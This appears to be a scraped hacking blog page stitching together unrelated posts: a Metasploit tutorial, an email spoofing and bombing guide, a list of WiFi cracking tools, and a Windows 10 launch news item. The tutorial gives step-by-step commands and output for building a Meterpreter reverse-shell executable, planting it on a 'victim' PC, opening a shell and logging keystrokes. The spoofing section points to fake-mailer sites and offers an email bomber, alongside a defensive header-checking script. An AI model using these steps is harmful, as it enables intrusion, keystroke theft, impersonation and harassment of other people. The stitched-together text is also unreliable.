Note: This is an advanced topic. Read carefully. Feel free to ask any kind of query; we are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words have full access to your PC, provided you have just a few security loopholes, which may arise for a reason as simple as not updating your Flash player last week when it prompted you to do so.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that everyone here can understand it. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all these tools are present in BackTrack).
In this tutorial, I'll be teaching you how to exploit a system using a Meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them).

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or a DoS attack on the target.
Overflow: An error caused when a program tries to store data beyond the size of its buffer. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what IS Metasploit?
It is an open source penetration testing framework used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little more difficult. They are released as a part of MAFIA (Metasploit Anti-Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness and power from a pentester's P0V. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
I would recommend doing the following things in Metasploit on BackTrack (a system or an image), avoiding the Windows version of the tool.
For those of you who don't know, BackTrack is a Linux distro especially for security personnel, including all the tools required by a pentester.
Download BackTrack from here. You can download the ISO or the VMware image, whichever you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin:
Open up BackTrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~# /etc/init.d/wicd start
to start the wicd network manager.
Finally, type "startx" to start the GUI mode:
root@bt:~# startx

First of all, know your local IP. Open up a Konsole (on the bottom left of the taskbar) and type in:
root@bt:~# ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Make a note of it.
Now, launch msfconsole by going to Applications >> BackTrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole

You should now have a shell, something similar to a command prompt in Windows.
msf >
Let's now create an executable file which establishes a remote connection between the victim and us, using the Meterpreter payload.
Open another shell window ("Session >> New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window).

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" X > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444.
(Everything has to be entered without quotes.)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, on your BackTrack desktop you would now be seeing a reverse_tcp.exe file.

Move it to your other computer on the same local network using a thumb drive or by uploading it online.


Now open the first shell window, the one with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are set up. You have already made an executable file which makes a reverse connection to you,
and now you have set the Meterpreter handler to listen for you on port 4444.
The last step is to type in "exploit" and press enter:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload handler is listening for all incoming connections on port 4444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a Meterpreter prompt like this:
meterpreter >
Type in ps to list the active processes:
meterpreter > ps

Search for explorer.exe and migrate to that process:
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger on the victim, just type keyscan_start.

Now, if you want to get a command prompt on the victim's computer,
just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now have a command prompt.
Type in whoami to see the victim's computer name:
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let's suppose you want to start Notepad on the victim's computer.
Type in:
Let's say the victim has typed something on his computer.
Just type exit to return to Meterpreter.
Now type in keyscan_dump to see all the typed keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is for educational purposes only. You should test it only against a computer you own.






Basics of how Email works (you can skip this part)

Email stands for Electronic Mail. Sending and receiving email is controlled by email servers. Email service providers configure an email server before anyone can sign in to his or her account and start communicating digitally. Users from across the world register with these email servers and set up an email account.


Email Travelling Path:
Let's say we have two email providers, one is gmail.com and the other is yahoo.com. ABC is a registered user on gmail.com and XYZ is a registered user on yahoo.com.
• ABC signs in to his email account on gmail.com, writes a mail to xyz@yahoo.com and sends the message.
• But what happens behind the curtain? The email from the computer of abc@gmail.com is forwarded to the email server of gmail.com. The gmail.com server then looks up yahoo.com on the internet and forwards the email to the yahoo.com server for the account xyz@yahoo.com. The Yahoo server puts that email in that account.
• XYZ then sits at her computer and signs in to her email account. Now she has the message in her inbox.



Sending Fake/Spoofed Email: A fake or spoofed email is an email that appears to come from any email ID you choose. It doesn't matter whether the sender's email really exists or not. The sender's email ID can be anything@anything.com.


Read the disclaimer before proceeding.


Methods:


1. Using open relay servers: An open relay server is one which allows anyone to send email by connecting to it. The user connects to it via telnet and instructs the server to send email. This method is outdated, or simply I should say that it doesn't work. I will not talk about it more.

2. Using websites: There are numberless websites that provide a free service to send fake emails. But the problem is that they attach advertisements along with your email. The best two I have found that do not attach advertisements are:

www.emkei.cz      {has some advanced options}
www.hidemyass.biz/fake-mailer/

3. Using mail sending scripts: PHP contains a mail sending function which allows us to send email with fake headers.
Download a PHP script from here.
We just need to upload the mail sending script to a web hosting site. It doesn't work on every web hosting site because some have no email sending support. I have tested x10hosting.com (it could take up to a day for account activation); it works perfectly. Some of the others are www.000webhost.com and byethehost5.com.

Note: This script contains options for sending spoofed email, spamming and email bombing. Your hosting account might be immediately suspended for spamming/bombing. But it works perfectly if you have your own premium web hosting account. If you want to try the email bomber, I could let you use my own if enough people request it in the comments.

What is Email Spamming and Email Bombing?

Email bombing, as is clear from the name, is sending mass emails, that is, a large number of emails to a single email ID in a single click. Email spamming is sending an email to a large number of email IDs in a single click. These activities are performed mainly to advertise the products or services provided by a company. Many spammers spam to collect individuals' personal information through some stupid trick like 'fill in these details to get your lottery amount', and that information is sold to businessmen looking for people of different categories. There could be many more reasons for spamming. Spammers use automated tools to collect as many email addresses as are available on websites, forums and chat rooms, and send spam to them.

How to identify whether an email is real or spoofed?

It can be done by checking the headers. Email headers are simply the text which contains information about the mail servers that the email encountered on its path from the sender to the receiver. They contain a lot of other information too.
Note: I am just telling you a few points about this so that you get an idea of the approach. Whether it works may depend on some factors.

We can view email headers in Gmail by clicking 'Show original', in Yahoo by clicking 'Full headers', and through similar options in other email service providers.

If you get an email displaying the sender's email as someone@gmail.com, someone@hotmail.com or someone@yahoo.com, then it should have originated from Gmail, Hotmail or Yahoo servers respectively. If it didn't, the email is most probably fake.

I will show you by an example. I received three emails in my Gmail inbox from the sender's address "someone@gmail.com". The sender's address tells me that they should have originated from a Gmail/Google server if they were real.

Note: There is a field called "Return-Path" in the headers. If the email ID shown in this field and the email ID you see as the sender's email ID don't match, then the email is surely fake.
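As an added illustration (not part of the original post), here is a small Python checker that applies the two header tests described above: it compares the Return-Path domain with the From domain and checks whether the earliest Received: hop belongs to the claimed provider. The sample headers and the provider-to-server table are constructed for this example and are not real mail or a complete list of provider servers.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed for this example: domains under which each provider's outgoing servers
# are expected to appear in the earliest Received: header (illustrative only).
EXPECTED_ORIGIN = {"gmail.com": ("google.com", "gmail.com"), "yahoo.com": ("yahoo.com",)}

# Constructed sample headers, not real mail; 192.0.2.x are documentation addresses.
GENUINE = """Return-Path: <someone@gmail.com>
Received: from mail-sor-f41.google.com (mail-sor-f41.google.com [192.0.2.41])
 by mx.example.net with ESMTPS; Sun, 13 Mar 2011 11:32:12 -0400
From: Someone <someone@gmail.com>

body text
"""

SPOOFED = """Return-Path: <www-data@shared-host.example>
Received: from shared-host.example (shared-host.example [192.0.2.77])
 by mx.example.net with ESMTP; Sun, 13 Mar 2011 11:40:01 -0400
From: Someone <someone@gmail.com>

body text
"""

def _domain(header_value):
    """Lower-cased domain of the address in a From:/Return-Path: header."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""

def _under(host, parents):
    """True if host equals one of parents or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == p or host.endswith("." + p) for p in parents)

def first_hop(msg):
    """Host named in the earliest Received: header. Each relay prepends its own
    line, so the last one listed is the oldest. Only lines added by your own
    servers are trustworthy: a sender can forge the ones below them."""
    received = msg.get_all("Received") or []
    m = re.match(r"\s*from\s+(\S+)", received[-1]) if received else None
    return m.group(1) if m else ""

def analyse(raw_message):
    """Apply the two header checks from the text: Return-Path vs From domain,
    and whether the first hop belongs to the claimed provider."""
    msg = message_from_string(raw_message)
    from_dom, rp_dom = _domain(msg.get("From")), _domain(msg.get("Return-Path"))
    findings = []
    # Forwarders and mailing lists legitimately rewrite Return-Path, so treat a
    # mismatch as a strong signal rather than proof on its own.
    if rp_dom and rp_dom != from_dom:
        findings.append("Return-Path domain %r differs from From domain %r" % (rp_dom, from_dom))
    hop = first_hop(msg)
    expected = EXPECTED_ORIGIN.get(from_dom)
    if expected and (not hop or not _under(hop, expected)):
        findings.append("first hop %r is not a known %s server" % (hop, from_dom))
    return {"from": from_dom, "return_path": rp_dom, "first_hop": hop,
            "suspicious": bool(findings), "findings": findings}
```

Paste the full header block copied from 'Show original' into analyse() to run the same checks on a real message.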






Can we get the sender's IP address from email headers?

We may or may not. Gmail and Yahoo normally do not reveal the sender's IP address. But when we send an email from a PHP script, the headers might reveal the sender's IP. The conclusion is that the answer to this question varies between email service providers and depends on the way the email is sent.


Can we trace the sender's location if we get his IP address?

The IP address could only tell us which Internet Service Provider (ISP) is used by the sender. Further details cannot be revealed without the help of that ISP. Normally the public IP is dynamic, that is, it keeps changing. We need to ask the ISP about the user who was assigned that IP at the time the email was sent. If the sender has purchased a static IP address, it doesn't matter exactly when the email was sent; he could easily be traced.


Ten Free Wireless Hacking Software Tools.

Internet is now a basic requirement, be it at the office or at home, as it is used heavily on smartphones besides computers. Most of the time people prefer to use a wireless LAN, which is much easier and more cost effective.
It has been observed that neighborhood WiFi hotspots are visible on a user's device; however, one can get access to them only by cracking the password, with the sole purpose of using free internet. Also, in big firms where all the employees are connected through a wireless network, the admin might want to keep a check on the network traffic, and hence even they need tools to test the network.
Vulnerability in wireless LANs is mainly due to poor configuration and poor encryption. Poor configuration includes the case of a weak password, sometimes set purposefully by the network admin to check the network traffic. Poor encryption is dangerous as it relates to the two security protocols WEP (Wired Equivalent Privacy) and WPA (WiFi Protected Access); WPA is again of two types, WPA1 and WPA2. WPA was introduced in 2003 as the WEP protocol was easy to crack. The tools used to hack a network are used either for the
  • purpose of sniffing the network, as is the case for network admins, and
  • cracking the password, used by programmers for troubleshooting and by people who want to use the internet free of cost. Based on this, there are around 10 tools which can be used to hack a wireless LAN.

Aircrack

The most popular wireless password cracking tool; it attacks 802.11a/b/g WEP and WPA. The tool's makers also provide a tutorial for installing the tool and using it to crack passwords. Prior to using this tool it is essential to confirm that the wireless card can inject packets, as this is the basis of the WEP attack. It can be downloaded from: http://www.aircrack-ng.org/

Cain & Abel

This tool intercepts network traffic and cracks passwords using cryptanalysis attack methods. It also helps to recover wireless network keys by analyzing routing protocols. It can be downloaded from: http://www.oxid.it/cain.html

inSSIDer

This tool has been awarded "Best Opensource Software in Networking" and is now paid software available at a cost of $19.99. It is a popular scanner for Microsoft Windows and OS X and can do a lot of tasks which can be helpful for admins to sniff the wireless LAN. It can be downloaded from: http://www.inssider.com/

WireShark

This is a network protocol analyzer, so again good for network admins to keep a check on traffic. The basic requirement is that the user should have a good knowledge of network protocols; only then can they use this tool. It can be downloaded from: https://www.wireshark.org/

CoWPAtty

This tool is an automated dictionary attack tool for WPA-PSK. CoWPAtty is simple to use; however, it is slow, as the tool computes the key for each word in the password dictionary using the SSID. It can be downloaded from: http://sourceforge.net/projects/cowpatty/

Airjack

This is a Wi-Fi 802.11 packet injection tool. It is mostly used to check for "man-in-the-middle (MITM) flaws" in the network and mitigate them. It can be downloaded from: http://sourceforge.net/projects/airjack/

WepAttack

This is an open source Linux tool for breaking 802.11 WEP keys. A WLAN card is required to work with this tool, and basically the tool attacks the working key using dictionary words. It can be downloaded from: http://wepattack.sourceforge.net/

OmniPeek

This is again a network analyzer tool, working only on Windows. It captures and analyzes network traffic and can also be used for troubleshooting. It can be downloaded from: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

CommView for WiFi

This is for wireless monitoring and protocol analysis. Captured packets can be decoded using user-defined WEP or WPA keys. It is mainly used to monitor WiFi traffic by professional programmers and network admins, and even at home. It can be downloaded from: http://www.tamos.com/products/commwifi/

CloudCracker

This is an online password cracking service for WPA-protected WiFi networks. It cracks passwords using a dictionary of around 300 million words. It is available at: https://www.cloudcracker.com/
Most of these tools are free; some of them are protocol analyzers for monitoring and troubleshooting, whereas others are for cracking passwords for unauthorized internet access, and there are tools which use dictionary words to crack the password.
For network admins and professional programmers these tools should be helpful for understanding password cracking and hence help them professionally.
However, one needs to be cautious when using the tools, as using them to crack passwords and get unauthorized access to the internet is an offense in some countries. Also, such tools are used by cyber criminals and terrorists to get easy, anonymous, free access to the internet.


Windows 10 has been installed on more than 14 million devices since launching worldwide on Wednesday 29 July, Microsoft has announced.
In the first 24 hours after beginning the rollout, Microsoft said it saw "unprecedented demand" for the new operating system, with reviews and customer feedback "overwhelmingly positive" around the globe.
The company has previously revealed that it wants Windows 10 to be on one billion devices by 2018. However, while the PC version of the operating system has been well received, market analysts have questioned its ability to compete with Android and iOS on smartphones.
Although millions of people have successfully completed the installation, there are many more who have reserved their upgrade to Windows 10 and are still waiting to receive it.
"As we’ve shared, our top priority has been ensuring that everyone has a great upgrade experience, so, we are carefully rolling out Windows 10 in phases," said Yusuf Mehdi, Microsoft's corporate vice president for Windows and Devices Group, in a blog post.
"Rest assured we are working 24×7 to continue the upgrade process. We are grateful for your excitement and enthusiasm and we appreciate your patience over the days and weeks ahead as we carefully roll out Windows 10 in phases to all of you that have reserved."
Windows 10 is the latest version of Microsoft's operating system software, combining what it describes as the "best elements" of Windows 7 and Windows 8. It features a redesigned Start menu, which brings together the Windows 7 navigation panel with "live tiles" from Windows 8, and a new web browser called Edge.
Windows 10 also comes with Microsoft's virtual personal assistant, Cortana, which pops up with notifications and suggestions, and learns the user's preferences over time.
Unlike with previous versions, there will not be a separate Windows Phone 10 operating system. Instead, Windows 10 will be used across all Microsoft devices, including PCs, tablets and smartphones – as well as the Xbox games console and Microsoft's holographic headset, HoloLens.
A feature called Continuum means that the software automatically detects whether there is a keyboard attached to the device and selects the most appropriate mode.

Windows 7 and Windows 8.1 users were given the opportunity to pre-order their free copy of Windows 10 in the weeks leading up to the launch, and these are the people to whom Microsoft is currently rolling out the update. Customers will be notified once their PC is ready for Windows 10 with a notification in their system tray.
If you didn't reserve your upgrade to Windows 10, you can still reserve your free upgrade using the "Get Windows 10" app on your Windows 7 or Windows 8.1 PC, or download it directly using the media creation tool on this page.